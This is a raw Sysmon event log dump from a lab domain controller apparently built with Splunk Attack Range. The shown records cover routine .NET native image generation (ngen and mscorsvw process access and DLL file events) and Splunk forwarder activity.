21:03:31.050{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:31.018{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.018{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:32.972{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F7A8F7492CF768930BF15636ABA826A,SHA256=DA94E9B2FEF6AC487CEF03B51B9F516373C488E4D8B78B9C67611DE5412EF73E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.260{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61414-false10.0.1.12-8000- 10341000x800000000000000020077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:32.737{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:32.737{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.972{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07765F12B9C0989413F4CBE791CAAEB,SHA256=2210CE7D89ADC40795C3FA906027371FAACCFB094A5FCFA93BE125DB1DB03ADA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:33.690{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A5-60D3-2F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.675{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A5-60D3-2F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.612{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3C03-00000000CF01}6928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.581{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3B03-00000000CF01}4832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.581{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3B03-00000000CF01}4832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.565{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3B03-00000000CF01}4832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.565{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b18-0\Microsoft.GroupPolicy.Commands.dllMD5=F999FA3CE2FFE86E86886C6826A276DD,SHA256=3E89D13E6F0B6AA16CE301B010FFE629D51DD7B0FBECC0DE1A071CD3082EC72E,IMPHASH=00000000000000000000000000000000truetrue 
11241100x800000000000000020130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.550{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b18-0\Microsoft.GroupPolicy.Commands.dll2021-06-23 21:03:35.550 10341000x800000000000000020129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.409{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.393{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.393{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3A03-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.393{4DB9351A-A1A7-60D3-3903-00000000CF01}6996NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b54-0\Microsoft.GroupPolicy.Commands.dllMD5=F999FA3CE2FFE86E86886C6826A276DD,SHA256=3E89D13E6F0B6AA16CE301B010FFE629D51DD7B0FBECC0DE1A071CD3082EC72E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:03:35.378{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b54-0\Microsoft.GroupPolicy.Commands.dll2021-06-23 21:03:35.378 10341000x800000000000000020124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.237{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.222{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.222{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3903-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.175{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3803-00000000CF01}6908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.159{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3803-00000000CF01}6908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.159{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3803-00000000CF01}6908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.143{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
